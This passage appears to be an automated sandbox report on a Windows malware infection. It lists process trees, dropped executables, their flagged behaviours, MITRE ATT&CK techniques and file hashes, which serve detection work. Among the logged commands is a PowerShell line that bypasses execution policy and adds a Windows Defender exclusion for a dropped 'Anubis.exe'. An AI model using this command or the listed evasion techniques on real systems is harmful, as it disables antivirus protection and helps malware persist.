C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.1.1273430422\1444582335" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e66fd8c-be6d-4fa3-acd3-04c4b5ec5408} 636 "\\.\pipe\gecko-crash-server-pipe.636" 1488 d71258 socket9⤵PID:1564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.2.469860085\326288266" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26186f5e-302b-4746-a497-87e9b3f9c082} 636 "\\.\pipe\gecko-crash-server-pipe.636" 2076 19d8d658 tab9⤵PID:2912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.3.1831267843\1460391090" -childID 2 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6f16a3e-f87a-44ce-b795-577abc62883c} 636 "\\.\pipe\gecko-crash-server-pipe.636" 2952 d63658 tab9⤵PID:2876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.4.1585189884\863238637" -childID 3 -isForBrowser -prefsHandle 3444 -prefMapHandle 3440 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b182073-c45d-4670-a920-c085b7090e23} 636 "\\.\pipe\gecko-crash-server-pipe.636" 3696 1f63e958 tab9⤵PID:2748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.5.384292402\1804995797" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5531b395-033d-426e-b3de-7e2bd62d25ed} 636 "\\.\pipe\gecko-crash-server-pipe.636" 3812 1f63d758 tab9⤵PID:996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.6.1086096048\760004681" -childID 5 -isForBrowser -prefsHandle 4024 -prefMapHandle 4028 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9933e924-53f0-4c41-a534-010b0901e13f} 636 "\\.\pipe\gecko-crash-server-pipe.636" 4012 1f63f558 tab9⤵PID:2276
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106810101\e45f20b736.exe"C:\Users\Admin\AppData\Local\Temp\10106810101\e45f20b736.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106821121\PcAIvJ0.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:3196
-
-
C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 12047⤵
- Loads dropped DLL
- Program crash
PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3656 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 10208⤵
- Loads dropped DLL
- Program crash
PID:3784
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5047⤵
- Loads dropped DLL
- Program crash
PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106850101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10106850101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\zuuBU1dU\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
PID:3176
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3944 -
C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"7⤵
- Executes dropped EXE
PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"7⤵
- Executes dropped EXE
PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 5167⤵
- Program crash
PID:4084
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106870101\SvhQA35.exe"C:\Users\Admin\AppData\Local\Temp\10106870101\SvhQA35.exe"6⤵
- Executes dropped EXE
PID:3276 -
C:\Users\Admin\AppData\Local\Temp\onefile_3276_133856820825400000\chromium.exeC:\Users\Admin\AppData\Local\Temp\10106870101\SvhQA35.exe7⤵
- Executes dropped EXE
PID:3364
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106880101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10106880101\FvbuInU.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9UR26M8S\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9UR26M8S\soft[1]
Filesize987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD58371d5dd44efe32a5dac94dd73577106
SHA1f0cb61c736833cddbc0b4d5348b900ad477967d2
SHA256426a676592a88034585653bc377c864c230f2a3b9534ef5df046552aae410ccb
SHA512045395b16bbc27ba579805ef44f0df372d992600daab0a7c564c3ead26557a8581fb1ed29e545b7e7c91e7bdaba43dd20ff11cf8402bf922a770747e7d6e84a0
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
938KB
MD515743c2914c612762ee60b2f12678ecf
SHA1b5aedc0e729c59675d5000ef153ea45611ee3dea
SHA2565f7ca62b9d262cf5145711224a4c498739904b721a7131e52bdf9265a441d895
SHA512926c21456df80d22477baa3c03c5bc175a5aeaa9d0b4efd9f211654fdd120b8fa620328c44a3399a0ab2145cc68eb5b881db7360fe818dee3e312c12b4a44aaf
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
3.8MB
MD5d4873846c90f3c15789b4da8453ae20c
SHA1665e9dade1075ce981af4eef928d140b6ba2ec98
SHA25671bcb77002e2dbddb270406a604a358dafe3461f03af3f4afe0bc2dd8ff6522e
SHA512d71afcc5a5e6932a5dead7fafd9a9280eb0f2eef7b068a02318af404519e93b36216f5c59125067a2ff72d179194406872f5fdae3870cff30f0258ff5a89cafe
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD5b62cf4ef1beba985a1c8985becba5f6d
SHA14aad88e88cd916222e81951a30dd4d65c6070ced
SHA25602531a05cdc60b09c3c831fe0ce557ba916d3ce7c8dde30a20dcc14436e05e4b
SHA5127f983cfa8ff6a31f42aa4d1f1bb8b0be96618871046fc48345654d20f74f48662030a1d954aa4ca9e0766ebb1d8b03fba0b1bce15b015762e0b9cd281e50faa5
-
Filesize
1.8MB
MD5dfbd8254f8f452c4efee8f92f623923f
SHA15ae96189ce5bf17bdbf2804227221ba605cffc2b
SHA2566100c8b2a1b5b81783da1847a812af9c75849e44368cf9847eaea47e02b04699
SHA512d7940f24817cd2c180babce402a1f532e50785c1a9a69180f57a32091eb48f7112300c2e9ed4a07e8eae60accfc82acd1d3d8b1cf4a8e7bb6549b06f58c988a4
-
Filesize
120KB
MD55b3ed060facb9d57d8d0539084686870
SHA19cae8c44e44605d02902c29519ea4700b4906c76
SHA2567c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA5126733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a
-
Filesize
3.1MB
MD5fd04c991eb10a5f15e684a9fcedeb50f
SHA1e71ff46aa0903316a6d201bdc6cc9ab877d15a1e
SHA256563a5dada30127a4b2c6aa536439601ceeafb512153d1a12a67666f7518f1b50
SHA512c495154170afe875ea5f993cf2acbe8bca6f837214b5a6bccc02826a04420c7860e48ba5553a216f610ff8aeee32f1ffbaedd5c4fee3d63fc506e0b04cc9baf7
-
Filesize
1.6MB
MD5d766667c52ba9bea7bf4d5cf23a646bd
SHA1fc48719a442c7df839dae40025c46168aeb9fed0
SHA2568253e094b314b0b2f0ca057d60e7d7b3bfe28d244eb21993c068d7446a1c97bd
SHA512c4255d39087f049cf58ab72b0e64f2296c648a8680714f3b554bfa7bdcfe79fb640629acb5bb48b2d0ef7075abc242665dc0faea56aaed0144772232a9132c2a
-
Filesize
945KB
MD5a385d8c31ef92df2eb6c581dce6242ef
SHA16a432f5a32f4f5e6936430bc02d399f82949201c
SHA2567b8e747133f72581a37cc17beec2f3871865a524d87e311092fd8c4ccce3bd0c
SHA512832b5623ad608123318fec3a89edad57c7fa0fe364bd8a67a7eb7fade9a74a06ceef00f49df18f6ba57fb83913d98dbf38719889f9662aca4f78e0b2334d1077
-
Filesize
1.7MB
MD5e0554aae53db10231ec8fb6a0c848e81
SHA134fc237065e5efd90fecd17c9446c3c6546414d4
SHA2564a68ac0915fa15d9d13de6260aa3e939d8f8d5c2e68bf64c202a43e59ca0f28e
SHA512d24323de270d79e57109fea6ace5dedeb1451183f75f71ceb747f053da33aef37ff9cffd64c5a42943589871208f082a9b714d0757c43c549708d3cd5c254d62
-
Filesize
275B
MD5c203adcd3b4b1717be1e79d7d234f89c
SHA1a0c726c32766f5d3e3de1bdc9998da2bb2a657e4
SHA256bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8
SHA512724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
48KB
MD5d39df45e0030e02f7e5035386244a523
SHA19ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA51269866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64
-
Filesize
350KB
MD5b60779fb424958088a559fdfd6f535c2
SHA1bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f
-
Filesize
11.5MB
MD59da08b49cdcc4a84b4a722d1006c2af8
SHA17b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb
-
Filesize
1.8MB
MD5f155a51c9042254e5e3d7734cd1c3ab0
SHA19d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA51267ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a
-
Filesize
717B
MD56ee62fa9c51b553d0149882574d8604a
SHA14c177b2d5ac2fe6533305c4470d7cc4575e30353
SHA256c3e3bbf51e747b5758b091cbb5929afad0d3c689b260223a1584610d925cd516
SHA5124af1753ed54ef5d26edfcacc2c71a3806a69d42a9cc44ff8f29f284cf3089220786e911c8541fd89fba96d132378118883ccb1bfe4d6b94652bad6fa60d0bbd7
-
Filesize
334B
MD53895cb9413357f87a88c047ae0d0bd40
SHA1227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA2568140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
717B
MD5c23451ee0f09330ce020906474215a6a
SHA171149cdfa59992e415ba7195992131c01e9ffff7
SHA2563919c67ad52c57b697d866bd8ef77be80f2c247598d3af47330c77457e63905c
SHA5127254eeec3ed8259f80d9a35035288005cfbbff2c3c2c14967a0d940c4863057badb67e015d2c2c7282ba42d03ad774f962c1c666c3d8216e5cebc95fefca1e62
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H3URBGIRCO4EI1AL026B.temp
Filesize7KB
MD501ece2ae5cc5c92c44943e7ce84e41b4
SHA15830a89c70b29b5d21eeed1c6b0d0f8d7cc33b19
SHA256ace9add8c7b6c4c613d7b98996ae127c040e571edeacb4dba6cac70092d43434
SHA5122b2222b3d69b90aea2e8802d22dfe3503e8366502a80a089553f0685a63374a0b7023614c514fdb092d5367bdcb55ba9e907903316e76adfe7724532d25e9432
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c968909329dc48afcafcd92261244c91
SHA121d255b0d389147af3aebe57de9b5793ba42f895
SHA25699dfa6b563b6041e4aac9d4d04681aa61fe32069d3d8ea643e734142ad99a669
SHA512c40e53ca04fa24b2b1455548eb5f1bc3d3fd6a20fee750dd0c0cc7517410f80f38ee2eadd4802a2091bd4600cb6fb7f163e89eae3a2dd80a7be4df8b4090ca61
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD571881fa28ad1de94fc26b618ad1f9598
SHA1a38adf684ace59ba5e53a644f7d2043264d6e9e1
SHA256db1338109aade29b83e107efdec53e647b1dc7ff93ff9aacdef9ac7228387077
SHA512c8a65d801170c10ccfb010d890fcc4947ed7b28d573bfa7f8c6e5fb07a331e376ca59c98d9a29b1bb4a8e789968c88d661873c545003f5ea5c3fb34d45ab8fdc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\0ee5efe9-64d5-420e-aa33-9e9980c67283
Filesize12KB
MD5725ba52e0a1c76dfcf6d84337c1031a4
SHA1137cfd5124d17b7661142b152f4383c963ae562d
SHA256590ea5716b1cd9e43656b8c96d97463435f0f9a5c248db5f04b44a9d47c94398
SHA5126133f7fc7e65425df71f00c249536abae77fc9deed49aa9099c94ebcac777d988644d8eae519ad9b3b8306bbf3aa6606ece9f6f60b897306a25bc99055d9200f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\3d2ba710-9ee1-4e52-b67c-3463c0783380
Filesize745B
MD5a1a2a74e6b39e29458e4c4ec3d8aaa18
SHA146df9e5dc5984636c7d93c5269eea3ac7950cfb9
SHA256a4b2a8e801cbecde714f622f7912f812a94e94e3fef39cf79792acffc4104677
SHA5126bcd3566f8073084b5d02a4cc9374eadd82a9c3ba791cb3d63263bd6d9e96f8987587332753752623250e5ca747acce3af1b084e7ec91a41b1a62deac749199b
-
Filesize
6KB
MD5494a3f48a3731dca33a121ac56f4c33e
SHA16b7e272bf2e46ebb8eac1c1a4f366051427be0a0
SHA256bdd8a4043b272f8dfbe3dcaefe33c41e4ee22b996f13899aedd370c34039242b
SHA512c425c38e2dd060e454f58197fdaf7f7d0691d5663c933d4c476e05c597cea464f63c14ac1f572c904760881f0e92527a94371f81da03a6f2711e218f7b02d6a0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD513bc7a294ce5f2f8e6095d034d2d40c3
SHA18e6bbc2e7b57ae62f63d8db4fcef4baa172c3a4b
SHA25668d91d48367a9d268b29d25d160e4419fd7ef089743e366fab9196fd5f784a3d
SHA512aa408aba9965ac09d66a133d1a095cea571eb40bc1714541032b03875a416a2c4e534c12155a13d7e6e0362632611b7faaad0ee12a0267c64c457d3ae28a6019
-
Filesize
1.8MB
MD509e00631d85ee0955f01a859559615f7
SHA1fdfcd6e6a51797322526ad74f7cb0050c9d3e6b5
SHA256f62908ccaf5e61f223f3e1a7a8d1351dd61327afdd5263b4084f58ad1bd45297
SHA512079bafcff76d5ec1bc14bdb39b15de51e30e3cfb02a0155625ddb9207d908b07a04f12e39b6a0e6952129efc598697957c0d1b72beb1a52aa752ff9b14619e34